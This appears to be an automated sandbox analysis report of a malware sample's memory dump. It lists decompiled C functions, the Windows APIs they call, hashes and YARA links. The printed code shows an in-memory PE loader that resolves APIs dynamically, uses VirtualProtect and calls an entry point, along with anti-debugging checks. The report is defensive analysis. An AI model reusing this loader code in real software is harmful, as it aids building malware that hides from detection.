Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 12223f83d53c1d33638344055746a1a1838427fe65ca6d0fec3afedfc6c7a73b
Instruction ID: d8356ad67886a91c45ef758378615ac1e0132dea1b6ea7e836af4129fb35f111
Opcode Fuzzy Hash: 12223f83d53c1d33638344055746a1a1838427fe65ca6d0fec3afedfc6c7a73b
Instruction Fuzzy Hash: 60018476F00515EBCB01CBE5CD00EDF77BDEF55240F128161E900E7104E631DA45ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1B1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e1b41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1b41cc - 0x63698bc4 &  !( *0x6e1b41cc - 0x63698bc4);
				_t18 = E6E1B1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1b41cc - 0x63698bc4 &  !( *0x6e1b41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1b41cc - 0x63698bc4 &  !( *0x6e1b41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E1B1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E1B1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E1B126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E1B142F(_t42);
					L8:
					return _t29;
				}
			}

0x6e1b144c
0x6e1b144e
0x6e1b146a
0x6e1b147b
0x6e1b1482
0x6e1b14e0
0x00000000
0x6e1b1484
0x6e1b1484
0x6e1b148e
0x6e1b1492
0x6e1b1497
0x6e1b149a
0x6e1b149f
0x6e1b14a3
0x6e1b14a8
0x6e1b14ad
0x6e1b14b1
0x6e1b14b6
0x6e1b14b7
0x6e1b14bb
0x6e1b14c0
0x6e1b14c8
0x6e1b14c8
0x6e1b14c0
0x6e1b14b1
0x6e1b14a3
0x6e1b14ca
0x6e1b14d3
0x6e1b14d7
0x6e1b14e1
0x6e1b14e7
0x6e1b14e7

APIs

Part of subcall function 6E1B1060: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E1B1084
Part of subcall function 6E1B1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10A6
Part of subcall function 6E1B1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10BC
Part of subcall function 6E1B1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10D2
Part of subcall function 6E1B1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10E8
Part of subcall function 6E1B1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10FE

Part of subcall function 6E1B1A5A: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E1B148E,?), ref: 6E1B1A87
Part of subcall function 6E1B1A5A: memcpy.NTDLL(?,?,?), ref: 6E1B1ABA

Part of subcall function 6E1B1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1B1FB4

Part of subcall function 6E1B126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1B12A6
Part of subcall function 6E1B126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1B131B
Part of subcall function 6E1B126D: GetLastError.KERNEL32 ref: 6E1B1321

GetLastError.KERNEL32 ref: 6E1B14C2

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 3ba9d18c8e352b0c08ee5cdd4674a10adcaeeeb1bbd0afee56588a4250e978b1
Instruction ID: c82048be6964861ddf288b23049fb70f382e98b6143db3addfe3c1f472dd832f
Opcode Fuzzy Hash: 3ba9d18c8e352b0c08ee5cdd4674a10adcaeeeb1bbd0afee56588a4250e978b1
Instruction Fuzzy Hash: 3B112B76700705ABD710DBE9CC80DDB77FCAF48204B154569E905DB145EBB0ED4E97A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1E51A5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1E54C3,00000002,00000000,?,?,?,6E1E54C3,?,00000000), ref: 6E1E523E
GetLocaleInfoW.KERNEL32(?,20001004,6E1E54C3,00000002,00000000,?,?,?,6E1E54C3,?,00000000), ref: 6E1E5267
GetACP.KERNEL32(?,?,6E1E54C3,?,00000000), ref: 6E1E527C

Strings

ACP, xrefs: 6E1E51C3
OCP, xrefs: 6E1E51F9

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d2399ae59b5dcf9bfe632a20ea071db0f6ea5bf39e31d1867fbbbee154b09164
Instruction ID: 22fcaa259e0165e23ce3ddd6401f7b40b499eff69f7428183c2a9e6d449ed677
Opcode Fuzzy Hash: d2399ae59b5dcf9bfe632a20ea071db0f6ea5bf39e31d1867fbbbee154b09164
Instruction Fuzzy Hash: D821A476614902EBD7548BD9C904A8773B7EF65B54B628424F90AD7904E732DEC0E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E49FB, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

GetACP.KERNEL32(?,?,?,?,?,?,6E1D8D41,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E1E4ABC
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D8D41,?,?,?,00000055,?,-00000050,?,?), ref: 6E1E4AE7
_wcschr.LIBVCRUNTIME ref: 6E1E4B7B
_wcschr.LIBVCRUNTIME ref: 6E1E4B89
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1E4C4A

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: b1c61fbe6ee8d9429d143f552bc24d90f594f9290f48d476f6ede1290b124c51
Instruction ID: 86bee11c17db764475f104d4cb21414daaf90ee43412a61d782a6311a5821637
Opcode Fuzzy Hash: b1c61fbe6ee8d9429d143f552bc24d90f594f9290f48d476f6ede1290b124c51
Instruction Fuzzy Hash: BE712835604A16AAE718DBF5CC41FAA73ACFF94314F204829F516DB980E770E9C2A764

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E537A, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

Part of subcall function 6E1D7990: _free.LIBCMT ref: 6E1D79F2
Part of subcall function 6E1D7990: _free.LIBCMT ref: 6E1D7A28

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1E5486
IsValidCodePage.KERNEL32(00000000), ref: 6E1E54CF
IsValidLocale.KERNEL32(?,00000001), ref: 6E1E54DE
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1E5526
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1E5545

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 497058c5925a0f799604757b446b875f21bc39b405bd1c7408888fede78b2aef
Instruction ID: afd672961f011b89230fde11128eb892b91cf47d5bb67dfd9847230f0e146c45
Opcode Fuzzy Hash: 497058c5925a0f799604757b446b875f21bc39b405bd1c7408888fede78b2aef
Instruction Fuzzy Hash: 73517E72A00B06ABEF40DFE5CC45AEE73B9BF19701F144429F915EB540E7709984EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e1b41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e1b41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e1b41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e1b41a8 = _t5;
					 *0x6e1b41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e1b41a4 = _t6;
					if(_t6 == 0) {
						 *0x6e1b41a4 =  *0x6e1b41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6e1b1f11
0x6e1b1f1f
0x6e1b1f27
0x6e1b1f2c
0x6e1b1f76
0x6e1b1f76
0x6e1b1f2e
0x6e1b1f36
0x6e1b1f72
0x6e1b1f74
0x6e1b1f38
0x6e1b1f38
0x6e1b1f3d
0x6e1b1f4b
0x6e1b1f50
0x6e1b1f56
0x6e1b1f5e
0x6e1b1f63
0x6e1b1f65
0x6e1b1f65
0x6e1b1f6f
0x6e1b1f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1B1C8E,74B063F0,00000000), ref: 6E1B1F1F
GetVersion.KERNEL32 ref: 6E1B1F2E
GetCurrentProcessId.KERNEL32 ref: 6E1B1F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1B1F56

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: b3ab4837778b09b4f915560553bc9fb7b9d81d4740157ebbce5c5aabfd95102b
Instruction ID: 5aa3e5fee14e7c4b7d744d906f97ef789d92e7e86628d1795f4ebfca821e4f44
Opcode Fuzzy Hash: b3ab4837778b09b4f915560553bc9fb7b9d81d4740157ebbce5c5aabfd95102b
Instruction Fuzzy Hash: CAF01771E94A10AFEF509FA9A8097893BA4BF17711F11C01AF265D91C0E3B06487BB44

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBE2B, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 6E1DBEC6
FindNextFileW.KERNEL32(00000000,?), ref: 6E1DBF44
FindClose.KERNEL32(00000000), ref: 6E1DBF86

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b042dbe15903fd846244b28c8402e0a5d62088e637b230a8a3d603baf83b4214
Instruction ID: 87d8ce5a6a321ae13f714dbab8e2ccb46086545984ec91f9acfc0e48d502b0d7
Opcode Fuzzy Hash: b042dbe15903fd846244b28c8402e0a5d62088e637b230a8a3d603baf83b4214
Instruction Fuzzy Hash: 2941D672900119AFDB20DFA5CD88DEBB7BDEB95304F104599E506D7189EB309EC8DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D520E, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1D5306
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1D5310
UnhandledExceptionFilter.KERNEL32(?), ref: 6E1D531D

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8fe3d60abdc5ba44698e68a3f5b42e874d95314f98cc6bb8dbd723deb9560835
Instruction ID: 12c27bc8e5cadd6d771802ca29cb5aaa5990784b7b0dca4b63d8c88ccc081b3c
Opcode Fuzzy Hash: 8fe3d60abdc5ba44698e68a3f5b42e874d95314f98cc6bb8dbd723deb9560835
Instruction Fuzzy Hash: 3931C175901228EBCB61DF64D888BCDBBB8EF18310F6045EAE81CA7250E7709B85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB0D0, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E1CB0CF,?,0000FFFF,?,?,?,6E1D665B), ref: 6E1CB0F2
TerminateProcess.KERNEL32(00000000,?,6E1CB0CF,?,0000FFFF,?,?,?,6E1D665B), ref: 6E1CB0F9
ExitProcess.KERNEL32 ref: 6E1CB10B

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4e1363dfa0ecd8e9d04a1f68e832a6c0535aa48dcdf6f8f6fa915dcefb1d2070
Instruction ID: a2cce15b53a657cc4911649896d93d913e1709e1b31b3203a73b87f7f40ea738
Opcode Fuzzy Hash: 4e1363dfa0ecd8e9d04a1f68e832a6c0535aa48dcdf6f8f6fa915dcefb1d2070
Instruction Fuzzy Hash: 46E04672006608EFCF127F96CA0CE4C3BBAFB21A81B100814F815CB125CBB9D891EA51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C5240, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82284627451e9a7487a080eae16a9527f871a6878ef9205fe7fd302b0bdc16b
Instruction ID: 2a9bac8b6947d7b5860f49b2a46139a82048c604f0bd78daa0236d33836231ce
Opcode Fuzzy Hash: e82284627451e9a7487a080eae16a9527f871a6878ef9205fe7fd302b0bdc16b
Instruction Fuzzy Hash: FDF17F71E002199FDF14CFA8C89069DBBF1FF98714F258269D829E7344E734AA41DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EF260, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E1EF25B,?,?,00000008,?,?,6E1EEDDE,00000000), ref: 6E1EF48D

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f439ad3a10fe3bfa000706274f95e8e49dee9a80504810cf4cf303ac366839be
Instruction ID: fdbddf660847bbc1b5b5becb273649a0788fb0a15f7696c0a15742c4b44ad11d
Opcode Fuzzy Hash: f439ad3a10fe3bfa000706274f95e8e49dee9a80504810cf4cf303ac366839be
Instruction Fuzzy Hash: 73B16732210A09CFD714CF68D496BA57BA0FF59364F358658F8A9CF6A1C335E982DB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e1b41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1b4240 = 1;
										__eflags =  *0x6e1b4240;
										if( *0x6e1b4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e1b41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1b4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e1b41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e1b4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e1b41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1b4240 = 1;
							__eflags =  *0x6e1b4240;
							if( *0x6e1b4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1b4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e1b4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e1b41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1b4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1b248f
0x6e1b2492
0x6e1b2498
0x6e1b24b6
0x00000000
0x6e1b24b6
0x6e1b24a0
0x6e1b24a9
0x6e1b24af
0x6e1b24be
0x6e1b24c1
0x6e1b24c4
0x6e1b24ce
0x6e1b24ce
0x6e1b24d0
0x6e1b24d3
0x6e1b24d5
0x6e1b24d5
0x6e1b24d7
0x6e1b24da
0x00000000
0x00000000
0x6e1b24dc
0x6e1b24de
0x6e1b2544
0x6e1b2544
0x6e1b26a2
0x00000000
0x6e1b26a2
0x6e1b24e0
0x6e1b24e0
0x6e1b24e4
0x6e1b24e6
0x6e1b24e6
0x6e1b24e6
0x6e1b24e6
0x6e1b24e9
0x6e1b24ea
0x6e1b24ed
0x6e1b24ed
0x6e1b24f1
0x6e1b24f5
0x6e1b2503
0x6e1b2503
0x6e1b250b
0x6e1b2511
0x6e1b2513
0x6e1b2515
0x6e1b2525
0x6e1b2532
0x6e1b2536
0x6e1b253b
0x6e1b253d
0x6e1b25bb
0x6e1b25bb
0x6e1b253f
0x6e1b253f
0x6e1b253f
0x6e1b25bd
0x6e1b25bf
0x6e1b26a0
0x6e1b26a0
0x00000000
0x6e1b25c5
0x6e1b25c5
0x6e1b25cc
0x00000000
0x00000000
0x6e1b25d2
0x6e1b25d6
0x6e1b2632
0x6e1b2634
0x6e1b263c
0x6e1b263e
0x6e1b2640
0x00000000
0x00000000
0x6e1b2642
0x6e1b2648
0x6e1b264a
0x6e1b264c
0x6e1b2661
0x6e1b2661
0x6e1b2663
0x6e1b2692
0x6e1b2699
0x00000000
0x6e1b2699
0x6e1b2667
0x6e1b2668
0x6e1b266a
0x6e1b266c
0x6e1b266c
0x6e1b266e
0x6e1b2670
0x6e1b2672
0x6e1b2686
0x6e1b2686
0x6e1b2689
0x6e1b268b
0x6e1b268b
0x6e1b268c
0x6e1b268c
0x00000000
0x6e1b2674
0x6e1b2674
0x6e1b2674
0x6e1b267d
0x6e1b267e
0x6e1b2680
0x6e1b2682
0x6e1b2682
0x00000000
0x6e1b2674
0x6e1b2672
0x6e1b264e
0x6e1b2655
0x6e1b2655
0x6e1b2657
0x00000000
0x00000000
0x6e1b2659
0x6e1b265a
0x6e1b265d
0x6e1b265f
0x00000000
0x00000000
0x00000000
0x6e1b265f
0x00000000
0x6e1b2655
0x6e1b25d8
0x6e1b25db
0x6e1b25e0
0x00000000
0x00000000
0x6e1b25e9
0x6e1b25eb
0x6e1b25f1
0x00000000
0x00000000
0x6e1b25f7
0x6e1b25fd
0x00000000
0x00000000
0x6e1b2603
0x6e1b2605
0x6e1b260e
0x6e1b2612
0x00000000
0x00000000
0x6e1b2618
0x6e1b261b
0x6e1b261d
0x00000000
0x00000000
0x6e1b2624
0x6e1b2626
0x00000000
0x00000000
0x6e1b2628
0x6e1b262c
0x00000000
0x00000000
0x00000000
0x6e1b262c
0x00000000
0x00000000
0x00000000
0x6e1b2517
0x6e1b2517
0x6e1b2517
0x6e1b251e
0x00000000
0x00000000
0x6e1b2520
0x6e1b2521
0x6e1b2523
0x00000000
0x00000000
0x00000000
0x6e1b2523
0x6e1b254b
0x6e1b254d
0x00000000
0x00000000
0x6e1b255d
0x6e1b255f
0x6e1b2561
0x00000000
0x00000000
0x6e1b2567
0x6e1b256e
0x6e1b259a
0x6e1b259a
0x6e1b259c
0x6e1b259e
0x6e1b25b2
0x6e1b25b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1b25a0
0x6e1b25a0
0x6e1b25a0
0x6e1b25a9
0x6e1b25aa
0x6e1b25ac
0x6e1b25ae
0x6e1b25ae
0x00000000
0x6e1b25a0
0x6e1b2570
0x6e1b2573
0x6e1b2575
0x6e1b2587
0x6e1b2587
0x6e1b258a
0x6e1b258c
0x6e1b258c
0x6e1b258d
0x6e1b258d
0x6e1b2593
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1b2577
0x6e1b2577
0x6e1b2577
0x6e1b257e
0x00000000
0x00000000
0x6e1b2580
0x6e1b2580
0x6e1b2581
0x00000000
0x00000000
0x00000000
0x6e1b2581
0x6e1b2583
0x6e1b2585
0x6e1b2598
0x00000000
0x00000000
0x00000000
0x6e1b2598
0x00000000
0x6e1b2585
0x6e1b24f7
0x6e1b24fa
0x6e1b24fd
0x00000000
0x00000000
0x6e1b24ff
0x6e1b2501
0x00000000
0x00000000
0x00000000
0x6e1b2501
0x6e1b24c6
0x6e1b24c8
0x00000000
0x00000000
